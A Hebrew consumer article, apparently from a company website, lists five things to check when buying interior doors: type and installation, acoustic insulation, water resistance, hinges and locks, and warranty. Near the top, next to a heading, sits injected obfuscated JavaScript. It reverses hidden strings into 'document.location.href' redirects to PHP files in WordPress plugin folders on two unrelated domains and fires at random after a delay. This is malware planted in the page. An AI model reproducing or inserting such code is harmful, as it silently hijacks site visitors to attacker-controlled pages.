fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

חמישה נושאים שחשוב לבדוק כאשר חושבים לרכוש דלתות פנים

כאשר מדברים על דלתות פנים לחדרי הבית, הדירה או המשרד, מדברים על שני סוגי דלתות, סוג אחד כולל בתוכו את כל דלתות הכנף והסוג השני כולל דלתות הזזה.
דלתות פנים | Shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

דלתות פנים הן הגדרה כוללת לכל סוגי הדלתות המיועדות לצרכי תיחום חדרי מגורים, או חללי עבודה בשטח הבית/דירה או בשטח המשרד.

בעת רכישת דלתות פנים לסביבת המגורים או המשרד, יש להתייחס ל-5 נושאים מרכזיים שעל  כל אחד מהם תוכלו למצוא מידע כללי בשורות שלפניכם.

  1. סוג הדלת ושיטת ההתקנה

כאשר מדברים על דלתות פנים לחדרי הבית, הדירה או המשרד, מדברים על שני סוגי דלתות, סוג אחד כולל בתוכו את כל דגמי דלתות הכנף המגיעות בגודל סטנדרטי, בהתאם לגודל מפתח הכניסה לחדרי המגורים/עבודה והסוג השני כולל בתוכו דגמים של דלתות הזזה.

במקרים בהם מדובר בדלתות פנים מסוג דלתות כנף, שיטות ההתקנה כוללות: התקנת משקוף בהתאם לסוג המשקוף הרצוי לכם: משקוף ישר או משקוף עגול וזאת לצד שיטת התקנת דלתות קו אפס במסגרתה דלת הפנים מיושרת עם הקיר.

במקרים בהם מדובר בדלתות פנים מסוג דלתות הזזה, ישנן שתי שיטות התקנה עיקריות: התקנה חיצונית במסגרתה הדלת נעה על גבי מסילה המותקנת על הקיר והתקנה פנימית בה הדלת נעה לתוך כיס ייעודי בתוך הקיר.

  1. רמת הבידוד האקוסטי של הדלת

נושא מרכזי נוסף אליו חשוב להתייחס במסגרת רכישת דלתות פנים לסביבת המגורים או המשרד, הוא נושא הבידוד האקוסטי של הדלת.

נושא זה נבחן בשני פרמטרים מרכזיים: עובי הדלת וסוג המילוי, העובי הנדרש של דלתות פנים המתאפיינות ברמה סבירה של בידוד אקוסטי הוא 4.4 ס"מ וככל שהדלת עבה יותר, כך רמת הבידוד האקוסטי משופרת יותר.

בנוגע לחומרי הגלם מהם מייצרים את מילוי הדלת, ישנם מספר חומרים המשפרים את יכולות הבידוד האקוסטי של הדלתות וביניהם: מילוי כוורת שהוא למעשה מילוי המיוצר מקרטון דחוס, מילי פלקסבורד המיוצר משבבי עץ וסיבי פשתן דחוסים, מילוי פולימר המיוצר מחומרים פולימרים מוקצפים ומילוי צמר סלעים המותקן בדלתות פנים המשווקות מלכתחילה כדלתות אקוסטיות.

  1. עמידות הדלת בפני מים

דלתות פנים המותקנות בחדרים רטובים חייבות להיות עמידות למים ולכן, מומלץ לרכוש דלתות עמידות למים מלכתחילה.

  1. סוגי צירים ומנעולים

רכישת דלתות פנים מחייבת אתכם להתייחס גם לסוגי הצירים והמנעולים המותקנים בדלתות, כאשר בין יתר סוגי הצירים המותקנים בדלתות הפנים תוכלו למצוא: מערכת צירי פייפ המותאמת לכל סוגי דלתות פנים מסוג משקוף, מערכת צירים נסתרים המיועדת לדלתות פנים המותקנות בשיטת קו אפס ומערכות צירים כפולים או צירי ספר.

בנוגע למנגנוני הנעילה של דלתות הפנים, תוכלו למצוא מספר סוגי מנעולים נפוצים הכוללים בין היתר מנעול חבוי המגיע בתצורת צילינדר, מנעול מכני שקט ומנעולים מגנטיים המיוצרים מ-פרייט או נודימיום.

  1. אחריות

רכישה של דלתות פנים, היא ברוב המקרים רכישה כמותית של מספר דלתות בהתאם למספר החדרים בשטח הבית, הדירה או המשרד ולכן קיימת חשיבות רבה לנושא האחריות המוענקת לכם במעמד הרכישה.

חשוב לציין שהאחריות המוענקת לכם היא אחריות על הדלת עצמה ומרכיביה והיא לא כוללת אחריות על גבי ההתקנה המוענקת בנפרד על ידי מתקיני הדלתות.

דלתות פנים מעוצבות

כיום תוכלו ליהנות מהיצע הולך וגדל של דלתות פנים מעוצבות, המשווקות מתוך קטלוג של חברות הייצור השונות.

רכישת דלת פנים מעוצבת מתוך קטלוג מאפשרת לכם לבחור בסגנון העיצובי המועדף עליכם והמותאם ביותר לעיצוב הכללי של סביבת המגורים/עבודה, כאשר היצע הדגמים העיצוביים של דלתות הפנים כולל בין היתר: דלתות מתכת בצבע אחיד וברמת גימור של צביעה בתנור, דלתות מתכת  עם סורג/חלון זכוכית, דלתות מתכת עם משקוף פולימרי ודלתות מתכת קלה עם ציפוי מסוג למינטו במבחר גוונים ועוד.

תוכלו ליהנות גם ממבצעי מכירות מיוחדים, המתקיימים לאורך כל ימות השנה על ידי יצרני הדלתות, מבצעים אלו כוללים גם הנחות משמעותיות על דגמים מסוימים של דלתות פנים וגם הנחה כזו או אחרת ברכישה כמותית של  מספר דלתות, בהתאם למספר החדרים בביתכם או משרדכם.

לסיכום, יש מגוון סוגי דלתות וחשוב מאוד שתתאימו את הדלת המתאימה עבורכם ועבור הצרכים שלכם, כך שתוכלו לדעת שלא תאלצו להחליף דלת כל שנה, בהצלחה.

 

 

 

 

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות